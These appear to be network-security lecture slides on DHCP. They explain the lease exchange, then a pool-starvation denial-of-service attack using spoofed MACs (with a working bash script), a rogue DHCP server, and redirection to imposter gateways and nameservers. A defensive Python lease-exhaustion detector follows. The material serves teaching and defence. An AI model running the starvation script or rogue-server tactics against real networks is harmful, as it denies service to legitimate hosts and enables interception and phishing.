Using the DHCP protocol for a denial-of-service attack
David Morgan

Denial-of-service strategy against a DHCP server
- server issues IP addresses per MAC addresses
- administers a fixed pool of IPs
- stops issuing when it runs out
- perhaps we can artificially make it run out

DHCP protocol conversations: how IPs are provided
- sequence of 4 message types
  - discover: from client, ethernet broadcast
  - offer: from server to client
  - request: from client to server
  - acknowledgment: from server to client

Initial
- dhcp server on D; others lack IP addresses
- /var/lib/dhcpd/dhcpd.leases (if linux)
- dhcp leases:
    01 is free
    02 is free
    03 is free

B broadcasts discover
  "I need an IP; my MAC is. Can somebody help?"

D sends offer (if it runs a dhcp server program)
  "How about 01? You want that?"

B sends D request for what was offered
  "Yes please. I want to use 01."

D sends B acknowledgement
  "All right then, please go ahead; 01 is yours to use."

B uses it, D records it
- on B:
    ifconfig eth0 01
- dhcp leases on D:
    has 01
    02 is free
    03 is free

C broadcasts discover
  "I need an IP; my MAC is. Can somebody help?"

D sends offer
  "How about 02? You want that?"

C sends D request for what was offered
  "Yes please. I want to use 02."

D sends C acknowledgement
  "All right then, please go ahead; 02 is yours to use."

C uses it, D records it
- on C:
    ifconfig eth0 02
- dhcp leases on D:
    has 01
    has 02
    03 is free

E broadcasts discover
  "I need an IP; my MAC is. Can somebody help?"

D sends offer
  "How about 03? You want that?"

E sends D request for what was offered
  "Yes please. I want to use 03."

D sends E acknowledgement
  "All right then, please go ahead; 03 is yours to use."

E uses it, D records it
- dhcp leases on D:
    has 01
    has 02
    has 03
- ifconfig eth0 02

A broadcasts discover
  "I need an IP; my MAC is. Can somebody help?"

D sends no offer (nor anything)
  "I already gave away all 3 addresses. None left. Too bad I can't help him."

DHCP serves more than addresses
- routers: gateway for non-local destination IPs
- nameservers: where to find out names' IPs
- other stuff

D sends B more stuff, B implements/adopts it all
  "Please go ahead"
    your IP: 01
    your router:
    your nameserver: 66.207.15.100
- on B:
    ifconfig eth0 01
    route add default gw
    echo nameserver 66.207.15.100 >> /etc/resolv.conf

Now for unreasonable distortions
1. a single machine can consume all of the server's IPs
2. a machine can run a competing dhcp server
3. a dhcp server can misdirect hosts to imposters
   - gateways
   - name servers

Unreasonable distortion #1: consuming all the IPs
- anybody can get an IP from a server
- server just needs your MAC
- spoof a lot of MACs, request an IP for each
- until server is run out of business

Unreasonable distortion #1: exhausting server's IP pool
  "I need an IP, and my MAC is FF:FF:00:00:00:55"
  "I need an IP, and my MAC is 00:00:FF:12:34:56"
  "I need an IP, and my MAC is 66:BB:CC:11:11:11"

D obliges itself out of IPs
- dhcp leases on D:
    FF:FF:00:00:00:55 has 01
    66:BB:CC:11:11:11 has 02
    00:00:FF:12:34:56 has 03

MAC spoof in linux
    ifconfig eth0 hw ether 11:22:33:44:55:66
- server will give you different IPs as long as you present distinct MACs
- pseudo-code:
    loop
      assume new MAC
      request another IP
    end loop

Unreasonable distortion #2: a competing dhcp server
  10.0.0.2
  "You can take 192.168.1.199. OK??"
  "How about 03? You want that?"
  who wins??

You gotta be quick, gunslinger!
- indeterminate
- might depend on planetary alignment
- but speed helps a lot

B beats out real server D if
- B is faster (outside B's control)
- D is prevented by prior denial of service attack (under B's control)
  - please see unreasonable distortion #1

Unreasonable distortion #3: downstream misdirection
- tell hosts to use an imposter router
  - routers forward
  - the imposter router could sniff while forwarding
- tell hosts to use an imposter nameserver
  - nameservers redirect
  - the imposter nameserver can direct to wherever
  - wherever could phish and phake and phrolic

Run on client to implement DoS

    clear
    interface="eth0"
    for i in 0 1 2 3 4 5 6 7 8 9 F
    do
      # two random digits fill the last two octets of the bogus MAC
      number=$RANDOM; j=$[number %= 10]
      number=$RANDOM; k=$[number %= 10]
      mac="aa:bb:cc:$i$i:$j$j:$k$k"
      ifconfig $interface down
      echo -e "\n\ninterface's current addresses:"
      ifconfig eth0 | grep -E "HWaddr|inet addr"
      echo -en "\n --> Press key to request IP for bogus MAC: $mac \n"
      read
      # assume the new MAC, then ask the server for a fresh lease
      ifconfig $interface hw ether $mac
      ifconfig $interface up
      killall dhclient; sleep 1
      dhclient $interface
    done

Run on server to observe

    watch 'grep -E "lease|hardware" /var/lib/dhcpd/dhcpd.leases | grep -v \#; echo -n -e "\nnumber of outstanding leases: "; grep "lease 10" /var/lib/dhcpd/dhcpd.leases | sort | uniq | wc -l'

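Going one step beyond the server-side watch command above, this added example (not from the original slides) parses dhcpd.leases text and reports pool utilisation, the largest burst of new leases, and the dominant MAC prefix. The function names, the alert thresholds, the 4-address pool and the sample lease entries are all assumptions constructed for illustration.

```python
# Added example: function names, thresholds and sample data are assumptions.
import re
from collections import Counter
from datetime import datetime, timedelta

LEASE_RE = re.compile(r"lease\s+(\S+)\s*\{(.*?)\}", re.S)
STARTS_RE = re.compile(r"starts\s+\d\s+(\S+ \S+);")
STATE_RE = re.compile(r"^\s*binding state (\w+);", re.M)  # skips "next binding state"
MAC_RE = re.compile(r"hardware ethernet ([0-9a-fA-F:]+);")

def parse_leases(text):
    """Return {ip: (start, state, mac)}; the file is a log, so the last entry per IP wins."""
    leases = {}
    for ip, body in LEASE_RE.findall(text):
        starts, state, mac = (r.search(body) for r in (STARTS_RE, STATE_RE, MAC_RE))
        if not (starts and state):
            continue  # incomplete block, e.g. file read mid-write
        when = datetime.strptime(starts.group(1), "%Y/%m/%d %H:%M:%S")
        leases[ip] = (when, state.group(1), mac.group(1).lower() if mac else None)
    return leases

def assess_pool(leases, pool_size, window=timedelta(minutes=5)):
    """Summarise pool pressure: utilisation, largest lease burst, dominant MAC prefix."""
    active = sorted((w, m) for w, s, m in leases.values() if s == "active" and m)
    burst = 0
    for i, (start, _) in enumerate(active):
        burst = max(burst, sum(1 for w, _ in active[i:] if w - start <= window))
    prefixes = Counter(m[:8] for _, m in active)  # first three octets
    top_prefix, top_count = prefixes.most_common(1)[0] if prefixes else (None, 0)
    return {"active": len(active), "utilisation": len(active) / pool_size,
            "max_burst": burst, "top_prefix": top_prefix, "top_prefix_count": top_count}

def render_lease(ip, start, state, mac):  # builds one constructed lease entry
    return (f"lease {ip} {{\n  starts 1 {start};\n  binding state {state};\n"
            f"  hardware ethernet {mac};\n}}\n")

# Constructed sample: one ordinary client that later frees its lease, plus
# three leases handed to aa:bb:cc:* MACs within one minute.
SAMPLE = "".join(render_lease(*row) for row in [
    ("10.0.0.101", "2024/01/08 09:00:00", "active", "00:16:3e:2a:10:01"),
    ("10.0.0.102", "2024/01/08 10:15:02", "active", "aa:bb:cc:00:33:77"),
    ("10.0.0.103", "2024/01/08 10:15:20", "active", "aa:bb:cc:11:55:22"),
    ("10.0.0.104", "2024/01/08 10:15:41", "active", "aa:bb:cc:22:88:44"),
    ("10.0.0.101", "2024/01/08 11:00:00", "free", "00:16:3e:2a:10:01"),
])

if __name__ == "__main__":
    report = assess_pool(parse_leases(SAMPLE), pool_size=4)
    alert = report["utilisation"] >= 0.75 and report["max_burst"] >= 3  # assumed thresholds
    print(report, "ALERT" if alert else "ok")
```

On a real server the same functions can be fed the contents of /var/lib/dhcpd/dhcpd.leases, with pool_size set to the size of the configured range.
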
Please see
"Flaws within the Dynamic Host Configuration Protocol"
http://www.networkpenetration.com/dhcp_flaws.html